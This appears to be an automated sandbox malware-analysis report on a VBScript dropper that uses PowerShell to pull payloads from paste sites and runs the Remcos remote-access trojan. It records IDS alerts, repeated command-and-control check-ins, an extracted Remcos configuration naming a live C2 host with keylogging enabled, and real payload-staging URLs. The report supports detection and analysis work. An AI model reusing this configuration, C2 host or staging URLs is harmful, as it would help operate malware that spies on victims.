                    2024-10-31T07:42:30.076346+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49957 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:31.297618+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49965 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:32.485126+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49974 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:33.657910+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49980 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:34.813151+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49989 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:35.954553+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49997 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:37.063222+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50003 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:38.157818+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50009 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:39.219852+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:40.270568+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50026 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:41.314003+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50032 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:42.344399+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50038 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:43.385290+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50044 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:44.375625+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50051 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:45.359620+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50058 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:46.329576+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50064 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:47.287882+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50067 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:48.219436+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50068 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:49.141592+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50069 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:50.063925+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50070 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:50.970039+0100 | 2032776 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50071 | 181.236.112.169 | 2001 | TCP
                    2024-10-31T07:42:51.875778+010020327761Malware Command and Control Activity Detected192.168.2.450072181.236.112.1692001TCP
                    2024-10-31T07:42:52.780861+010020327761Malware Command and Control Activity Detected192.168.2.450073181.236.112.1692001TCP
                    2024-10-31T07:42:53.641839+010020327761Malware Command and Control Activity Detected192.168.2.450074181.236.112.1692001TCP
                    2024-10-31T07:42:54.518547+010020327761Malware Command and Control Activity Detected192.168.2.450075181.236.112.1692001TCP
                    2024-10-31T07:42:55.398388+010020327761Malware Command and Control Activity Detected192.168.2.450076181.236.112.1692001TCP
                    2024-10-31T07:42:56.235002+010020327761Malware Command and Control Activity Detected192.168.2.450077181.236.112.1692001TCP
                    2024-10-31T07:42:57.176751+010020327761Malware Command and Control Activity Detected192.168.2.450078181.236.112.1692001TCP
                    2024-10-31T07:42:58.020953+010020327761Malware Command and Control Activity Detected192.168.2.450079181.236.112.1692001TCP
                    2024-10-31T07:42:58.829009+010020327761Malware Command and Control Activity Detected192.168.2.450080181.236.112.1692001TCP
                    2024-10-31T07:42:59.783941+010020327761Malware Command and Control Activity Detected192.168.2.450081181.236.112.1692001TCP
                    2024-10-31T07:43:00.580874+010020327761Malware Command and Control Activity Detected192.168.2.450082181.236.112.1692001TCP
                    2024-10-31T07:43:01.380012+010020327761Malware Command and Control Activity Detected192.168.2.450083181.236.112.1692001TCP
                    2024-10-31T07:43:02.178849+010020327761Malware Command and Control Activity Detected192.168.2.450084181.236.112.1692001TCP
                    2024-10-31T07:43:02.970527+010020327761Malware Command and Control Activity Detected192.168.2.450085181.236.112.1692001TCP
                    2024-10-31T07:43:03.737488+010020327761Malware Command and Control Activity Detected192.168.2.450086181.236.112.1692001TCP
                    2024-10-31T07:43:04.500479+010020327761Malware Command and Control Activity Detected192.168.2.450087181.236.112.1692001TCP
                    2024-10-31T07:43:05.470561+010020327761Malware Command and Control Activity Detected192.168.2.450088181.236.112.1692001TCP
                    2024-10-31T07:43:06.222550+010020327761Malware Command and Control Activity Detected192.168.2.450089181.236.112.1692001TCP
                    2024-10-31T07:43:06.974546+010020327761Malware Command and Control Activity Detected192.168.2.450090181.236.112.1692001TCP
                    2024-10-31T07:43:07.703876+010020327761Malware Command and Control Activity Detected192.168.2.450091181.236.112.1692001TCP
                    2024-10-31T07:43:08.442565+010020327761Malware Command and Control Activity Detected192.168.2.450092181.236.112.1692001TCP
                    2024-10-31T07:43:09.861260+010020327761Malware Command and Control Activity Detected192.168.2.450093181.236.112.1692001TCP
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:21.752336+0100 | 2858295 | 1 | A Network Trojan was detected | 188.114.97.3 | 443 | 192.168.2.4 | 49736 | TCP

                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-10-31T07:41:19.134483+0100 | 2841075 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 188.114.97.3 | 443 | TCP


                    AV Detection

                    Source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["sost.duckdns.org:2001:0"], "Assigned name": "NewssTar", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T0UVJ0", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                    Source: asegurar.vbs ReversingLabs: Detection: 15%
                    Source: Yara match File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 8_2_004338C8
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_63aeaf56-9

                    Exploits

                    Source: Yara match File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00407538 _wcslen,CoGetObject, 8_2_00407538
                    Source: unknown HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00407877 FindFirstFileW,FindNextFileW, 8_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Code function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_00407CD2

                    Software Vulnerabilities

                    Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 00007FFD9B97D896h 3_2_00007FFD9B97D7F8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4x nop then jmp 00007FFD9B97AD43h 3_2_00007FFD9B97ACD5

                    Networking

                    Source: Network traffic Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.4:49741 -> 181.236.112.169:2001
                    Source: Network traffic Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Network traffic Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Network traffic Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Malware configuration extractor URLs: sost.duckdns.org
                    Source: unknown DNS query: name: pastebin.com
                    Source: unknown DNS query: name: paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp String found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                    Source: unknown DNS query: name: sost.duckdns.org
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: Yara match File source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE
                    Source: global traffic TCP traffic: 192.168.2.4:49741 -> 181.236.112.169:2001
                    Source: global traffic HTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1 Host: rentry.org Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /d/Rrk2f/0 HTTP/1.1 Host: paste.ee Connection: Keep-Alive
                    Source: Joe Sandbox View IP Address: 104.20.3.235 104.20.3.235
                    Source: Joe Sandbox View IP Address: 164.132.58.105 164.132.58.105
                    Source: Joe Sandbox View IP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox View ASN Name: COLOMBIATELECOMUNICACIONESSAESPCO COLOMBIATELECOMUNICACIONESSAESPCO
                    Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network traffic Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49736 -> 188.114.97.3:443
                    Source: global traffic HTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: pastebin.com Connection: Keep-Alive
                    Source: global traffic HTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: rentry.org Connection: Keep-Alive
                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00404B96 WaitForSingleObject,SetEvent,recv
                    Source: global traffic | DNS traffic detected: DNS query: pastebin.com
                    Source: global traffic | DNS traffic detected: DNS query: rentry.org
                    Source: global traffic | DNS traffic detected: DNS query: paste.ee
                    Source: global traffic | DNS traffic detected: DNS query: sost.duckdns.org
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: HTTPS://PASTE.EE/D/RRK2F/0
                    Source: AddInProcess32.exe | String found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026026B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260271BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181950000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://rentry.org
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.o
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A865000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A87B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/Rrk2f/0
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/4B83LcVU
                    Source: powershell.exe, 00000003.00000002.1885223131.0000026023A98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1947421542.000002603DC62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886411782.0000026023CA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/J6uRjZrv
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026027201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/shqm6g9p/raw
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/shqm6g9p/rawP
                    Source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/vsm4ofxs/raw
                    Source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/vsm4ofxs/rawp
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                    Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
